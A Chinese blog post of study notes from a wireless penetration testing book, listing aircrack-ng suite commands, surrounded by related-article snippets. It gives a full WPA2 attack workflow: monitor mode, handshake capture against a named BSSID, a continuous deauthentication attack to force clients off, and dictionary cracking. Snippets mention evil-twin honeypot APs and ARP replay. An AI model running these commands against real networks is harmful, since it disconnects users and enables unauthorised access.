Wireless Penetration Testing(命令总结)

最新推荐文章于 2024-09-09 15:42:52 发布
最新推荐文章于 2024-09-09 15:42:52 发布
阅读量28 收藏
点赞数
文章标签: 网络 linux 服务器 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43304436/article/details/130777506
版权

1、对本书出现的无线网络涉及的命令做一总结

     查看无线网卡( Create a monitor mode interface using your card as shown in the following screenshot )

    ifconfig -a   

   

 ifconfig wlan0   (开启无线网卡)    airmon-ng start wlan0(开启混杂&监听模式) 

  扫描无线端口 接入点,(Ensure that channel hopping happens across bouth the 802.11 b gan g bands)  使用命令airodump-ng  --band ng --cswitch 1 wlan0mon  或者使用

 ariodump-ng  wlan0mon

通过是用airodump-ng 发现未授权的用户连接到认证的客户端,访问网络。

  收集需要侦查的无线网络MAC地址对应的流量(握手数据包),airodump-ng -c 1 --bssid  8C:A6:DF:B9:70:81  --write  WPA2  wlan0mon

   对于没有加密公开的WiFi 理论上抓不到到握手包,所以使用抓包的命令时 同时将自己链接的端切换到一个 加密的Ap广播点。抓包的时候要等待一下,出现 WPA handshake 的时候表示抓包成功

  

 对于不容易抓包的广播点 可以采取适当的攻击手段,迫使掉线之后再次抓包 aireplay-ng --deauth 0 -a 8C:A6:DF:B9:70:81 wlan0mon

 使用字典对抓取的握手包进行破解   aircrack-ng -b 8C:A6:DF:B9:70:81 -w words WPA2-01.cap    这里  .cap就是抓取的握手包

明月嫣然-疏桐-暖阳
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
Aircrack-ng 学习笔记
不急不躁
04-18 2365
破解过程简述: 1、先开启设备监听模式 命令:airmon-ng start wlan0 然后最下方会提示出monitor mode enabled on mon0 也就是监听模式已经在mon0开启 2、然后根据这个mon0的监听,搜索所有无线网络 命令:airodump-ng mon0 这里会列出能够搜索到的范围内的所有无线网络 这里注意几个重要参数即可 PwR是信号的强度,数
Kali.Linux.Wireless.Penetration.Testing.Beginners.Guide.1783280417
05-28
Kali Linux Wireless Penetration Testing Beginner's Guide presents wireless pentesting from the ground up, introducing all elements of penetration testing with each new technology. Learn various ...
Penetration testing _internal & wireless Penetration Testing
weixin_33735077的博客
12-26 124
第一部分 渗透测试步骤 ---参考资料 Ethical Hacking: The Value of Controlled Penetration Tests 下载地址 链接:https://pan.baidu.com/s/1ELFGTEnVx5d15eWHSmHzrQ 提取码:wd8l 复制这段内容后打开百度网盘手机App,操作更方便哦 1、Snort软件可以安装的操作系统的...
Wireless Penetration Testing (1-6 chapter)
weixin_34061482的博客
08-29 89
1、蜜罐和mis-Association攻击 设置蜜罐WeFi的方式有两种,分别如下,这两种的区别,就是 第二种是可以设置接入点MAC地址,而第一种是随机生成一个MAC地址,伪造的Ap接入点,支持同时伪造两个以上,一旦成功开启了honey AccessPoint,在使用 airodump-ng wlan0mon 扫描到的只能伪造点。 1 、airbase-ng -essid ...
Wireless Penetration Testing(7-11 chapter)
weixin_33991418的博客
08-30 80
1、AP-less WPA-Personal cracking 创建一个honeypoint 等待链接,特点在于不需要攻击致使链接的客户端掉线,直接获取了流量的握手包。 2、Man-in-the-Middle attack(中间人攻击) Eavesdropping and Session Hijacking(窃听和会话劫持) 中间人攻击是强有力的一种攻击方式再 WlAN ...
wireless Penetration Testing & Honeypot and Mis-Association attacks
weixin_34310785的博客
12-26 86
重新记一遍 ,在捕获握手数据包的时候不容易获取,所以使用ARP请求。使用自己的无线网卡的地址发送请求,会容易使得无线开启端掉线,迫使重新连接。 1、使用命令 aireplay-ng -3 -b aa:aa:aa:aa:aa:aa -h 目标无线MAC地址 wlanmon 其中-3表示使用APR请求 2、如何攻击加速捕获数据包的速度 使用命令 aireplay-...
Wardriving & Wireless Penetration Testing
TopMVP
11-20 442
版权声明:原创作品,允许转载,转载时请务必以超链接形式标明文章原始出版、作者信息和本声明。否则将追究法律责任。http://blog.csdn.net/topmvp - topmvpWarDriving and Wireless Penetration Testing brings together the premiere wireless penetration testers to outl
36 Windows Tools For Penetration Testing
kezhen的专栏
01-07 1758
Most penetration testers are using either a Mac or a Linux-based platform in order to perform their penetration testing activities.However it is always a good practice to have and a Windows virtual ma
37 Powerful Penetration Testing Tools For Every Penetration Tester
kezhen的专栏
03-19 2345
Wouldn’t it be fun if a company hired you to hack its website/ network/ Server? Well, Yeah!!! Penetration testing, commonly called as pen-testing is a on a roll in the testing circle these days. The
Backtrack 5 - Wireless Penetration Testing Beginner's Guide
07-24
If you are an IT security professional or a security consultant who wants to get started with wireless testing with Backtrack, or just plain inquisitive about wireless security and hacking, then this...
Kali Linux Wireless Penetration Testing
06-02
Kali Linux Wireless Penetration Testing
UDP协议
hyldzbg的博客
09-04 874
把当前要计算校验和的数据,每个字节,都进行累加,把结果保存到这两个字节的变量(校验和)中,过程中溢出也没关系,如果中间某个数据,出现传输错误,第二次计算的校验和就会和第一次不同(CRC这个算法其实不是特别靠谱,比如如果前一个字节大小少1,后一个字节大小多1,那么最后得到的校验和任然相同,但是数据可能已经不同了)。描绘这个数据报的报文长度(包含报头),这里的长度是指该报文有多少个字节,因为只有16位比特位的大小,因为数据传输可能会出错,所以需要一定的方法知道所传输的数据是否正确传输。
网络第五章:多路转接
qincjun的博客
09-05 579
2.HTTP1.1采用了长连接的方式来进行通信:建立连接,服务器响应完之后,不断开连接,活跃的用户对服务器发送请求,服务器都会正常响应;对不活跃的用户,不进行任何操作;events是分配好的epoll_event结构体数组.epoll将会把发生的事件赋值到events数组中 (events不可以是空指针,内核只负责把数据复制到这个events数组中,不会去帮助我们在用户态中分配内存).epoll通过这些值的设定,来监视fd的行为,如果fd做了这些行为,则会通过epoll_wait来反馈给上层,进行处理。
JAVA—网络通信
Hismybestlove的博客
09-05 1435
本文是学习网络通信入门和简单了解UDP协议和TCP协议,学习和了解CS架构和简单了解BS架构和HTTP协议
​数据链路层——流量控制&可靠传输机制 ​
最新发布
qq_25467441的博客
09-09 373
例题:一个信道的数据传输率为4kb/s ,单向传播时延为30ms ,如果使停止-等待协议的信道最大利用率达到80%,要求的数据帧长度至少为。设数据帧的长度为L比特,则发送方发送全部的数据需要时间:L/4。“停止-等待”就是每发送完一个分组就停止发送,等待对方确认,在收到确认后再发送下一个分组。因为是在讨论可靠传输的原理,所以并不考虑数据是在哪一个层次上传送的。发送方在一个发送周期内,有效地发送数据所需要的时间占整个发送周期的比率。数据链路层的流量控制是点对点的,而传输层的流量控制是端到端的。
BackTrack 5无线渗透测试入门指南:实战技巧详解
该书作为《BackTrack 5 Wireless Penetration Testing Beginner's Guide》的一部分,专为那些希望深入了解无线网络安全漏洞检测和攻击防御技术的人设计。 BackTrack 5是一款基于Linux的活体CD/USB系统,特别适合于...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

明月嫣然-疏桐-暖阳

你的鼓励是我开源的动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值